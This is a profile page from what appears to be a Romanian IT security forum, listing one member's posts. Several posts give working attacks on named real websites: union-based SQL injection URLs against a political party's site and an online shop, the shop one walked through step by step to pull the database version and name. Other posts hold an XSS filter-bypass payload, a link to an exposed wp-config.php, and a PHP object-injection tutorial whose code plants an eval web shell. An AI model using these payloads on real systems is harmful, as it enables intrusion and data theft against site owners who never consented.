Jump to content

dancezar

Active Members
  • Posts

    981
  • Joined

  • Last visited

  • Days Won

    20

Everything posted by dancezar

  1. Sql injection fara cerere SQL ...
  2. Ereticule fi gata sa-ti primesti cipul!
  3. Misto challenge , MS:D
  4. Acelasi terminatie adica? 123 si 223 au acelasi terminatie? Poti sa imi dai un exemplu? MS:)
  5. Ok poti sa ne dai un alert(document.domain) ms:)
  6. //
  7. Serios tu chiar vinzi gaini pe un forum de securitate IT ? Daca e serios si nu trolling , imi cer scuze si spor la vanzare:)
  8. http://s17.postimg.org/8xp6ui8ym/image.jpg GG //Adica eu nu am executat un alert adevarat?
  9. Bravo desteptule , bine ca esti tu destept si nu ii lasi si pe alti sa il rezolve . Cica "L-am terminat eu..." l-ai terminat si tu , vrei sa spui. //edit fail a folosit acelasi vectori ca aici http://hacktracking.blogspot.de/2014/05/xss-game-area.html
  10. Da cea ce am aratat este numai codul si ar functiona decat local cea ce se face in urma executiei va fi o clasa incompleta , multumesc pentru completare ideia era sa se inteleaga procesul.
  11. http://s24.postimg.org/hvjdgzr0z/xss.png Nice ma asteptam la ceva mai greu, dar au fost interesante. Unele cred ca au fost inspirate din cele care au fost gasite la ei //la 6 nici nu a fost nevoie sa execut xss din fisier extern
  12. http://www.fas.harvard.edu/~cafrica/wp-config.php "www.jpl.nasa.gov deci ca sa ma intelegeti pe asta l-am spart eu" Am vrut sa o spun in https://rstforums.com/forum/85196-arc-nasa-gov-xss-found.rst#post547892
  13. PHP Object injection Php object injection este o vulnerabilitate de tip RCE care este cauzata de folosirea necorespunzatoare a functiei serialize si unserialize din php.Aceasta functie serielize este folosita deobicei pentru pastrarea unui array intr-un string, spre exemplu daca aveti un array cu ultimele pagini accesate de utilizator si vreti sa le pastrati intr-un cookie ca apoi sa puteti sa folositi cookie-ul pe post de array puteti folosi aceste doua functii. Problema este ca se pote face serielize si pe classe iar atacatorul poate face o clasa prin care poate apela functia _contruct si sa execute cod php. Un exemplu de cod vulnerabil este acesta: <?php $d=unserialize(urldecode($_GET['a'])); ?> Cum vom putea exploata aceasta linie de cod in avantajul nostru ? Simplu vom incerca sa facem serielize la o clasa astfel cand vom introduce stringu serializat in ?a= in $d se v-a crea noua noatra clasa si se v-a executa codul nostru malitios. Rulam urmatorul cod: <?php class inj{ function inj($fil){ file_put_contents($fil,'<?php eval($_GET["a"]); ?>'); } } echo urlencode(serialize(new inj('SHELL.php'))); ?> In urma rularii codului de mai sus veti obtine payloadul: O%3A3%3A%22inj%22%3A0%3A%7B%7D Iar daca intrduceti acel payload in codul vulnerabil : site.com/phpobj.php?a=O%3A3%3A%22inj%22%3A0%3A%7B%7D se v-a crea fisierul c.php pe serverul victimei. Parametri vulnerabili sub care poate aparea vulnerabilitatea pot fi : $_COOKIE $_POST $_SERVER $_GET $_REQUEST Petru a evita aceasta vulnerabitate evitati folosirea acestor functii sau sa le inlocuiti cu json_encode in loc de serialize si json_decode in loc de unserialize O astfel de vulnerabilitate a fost reparata in vbulletin 4.2.2 Security Exploit Patched on vBulletin – PHP Object Injection | Sucuri Blog
  14. dancezar

    Jobbik.

    Observasem dupa ce am postat:)
  15. dancezar

    Jobbik.

    http://valasztas2014.jobbik.hu/videok.php?id=64 and 0 union select 1,@@version,3,4,5,6,7%23 http://valasztas2014.jobbik.hu/admin
  16. RCE Remote Code Execution : executi cod albitrar Ce e acolo e mai mult Albitrary file upload numai ca nu este trimis requestul prin POST ci prin GET
  17. hank12: #include<iostream> using namespace std; int matrice[10][10],n,m; int simetric_linie(int linie){ for(int i=0;i<n;i++) if(matrice[linie-1][i]!=matrice[linie+1][i]) return 0; return 1; } int main(){ int linie; cin>>n>>m>>linie; //citesti matricea if(simetric_linie(linie-1)) //daca incepi cu indici de la 0 cout<<"Simetric fata de linia "<<linie; else cout<<"Nu"; return 0; } Nu l-am testat ca nu am compilator la mine dar l-am testat in php si a mers. Si asa faci si la coloane numai ca schimbi notatiile in loc de matrice[linie-1] inversezi ee6354ac6a907b9e3a4895873fd9707cX
  18. daca am inteles bine ,dupa exemplul lui alex de mai sus este simetric fata de linia 2 spre exemplu?
  19. De unde pizda masi a ajuns ala la voi? @Kalashnikov. puteai macar sa ma anunti ca vrei sa il folosesti , totusi astept sa aflu unde l-ai gasit si cine ti l-a dat ca sa stiu cu cine mai fac sharing de acum in colo. //Cred ca e o versiune mai veche cea mai noua este postata la VIP
  20. Closed Felicitari celor care au reusit sa il rezolve! In primul rand este de tip String Bellman & Flint - Product Details Bellman & Flint - Product Details Numaratul coloanelor se face exact ca la Mysql http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 order by 1-- Si in total sunt 9 coloane apoi ca sa treceti de eroarea "Unable to cast object of type 'System.Int32' to type 'System.String'." care apare mai jos http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 union select 1,2,3,4,5,6,7,8,9-- Trebuie sa transformam coloanele in string pentru ca sunt numere.... http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27 union select '1','2','3','4','5','6','7','8','9'-- Pentru a extrage versiunea si Nick-ul vostru spre exemplu folosim + intre expresii http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27%20union%20select%20%271%27,%272%27,@@version%2b%27:salut%27,%274%27,%275%27,%276%27,%277%27,%278%27,%279%27-- In final asta e sintaxa : http://www.bellmanandflint.co.uk/product_details.aspx?product_id=1900%27%20union%20select%20%271%27,%272%27,%27Nick:danyweb09%27%2bchar%2860%29%2bchar%2898%29%2bchar%28114%29%2bchar%2862%29%2b%27Version:%27%2b@@version%2bchar%2860%29%2bchar%2898%29%2bchar%28114%29%2bchar%2862%29%2b%27First%20database:%27%2bdb_name%280%29,%274%27,%275%27,%276%27,%277%27,%278%27,%279%27--
  21. Good job! esti cel mai bun frate , felicitari ma intreb cum ai reusit?</scarcasm>
  22. este de la tine:))
  23. MSSQL ,union basedu pe care il stie toata lumea cu un mic trick la partea de tip de date(INT/STRING) . Eroarea spune totul Unable to cast object of type 'System.Int32' to type 'System.String'. Programatori stiu ce inseamna asta;)
  24. CLOSED Orice pm primit nu se v-a mai lua in considerare. Rezolvarea era foarte simpla! Am dat hintu intr-un post mai sus ••••••>GetMeOnTop Search for organic search engine ranking Daca bagati " este eliminat(Inlocuit cu NULL) ,va puteti folosi de el ca faceti bypass la xss auditor. Practic daca introduceti <scri"pt> filtrul v-a elimina " si v-a deveni <script>. ••••••>GetMeOnTop Search for organic search engine ranking<scri"pt>alert(1)</script> Si astfel v-a functiona pe ambele browsere!@
  25. Target: xxx.bellmanandflint.co.uk/product_details.aspx?product_id=1900 Cerinte : - Folositi doar Union Based NU ERROR BASED NU STACKED QUERY - Scoateti versiunea impreuna cu nickul vostru ,baza de date principala si username-ul - Trimiteti prin pm sintaxa Solveri: -denjacker -askwrite -BitMap
×
×
  • Create New...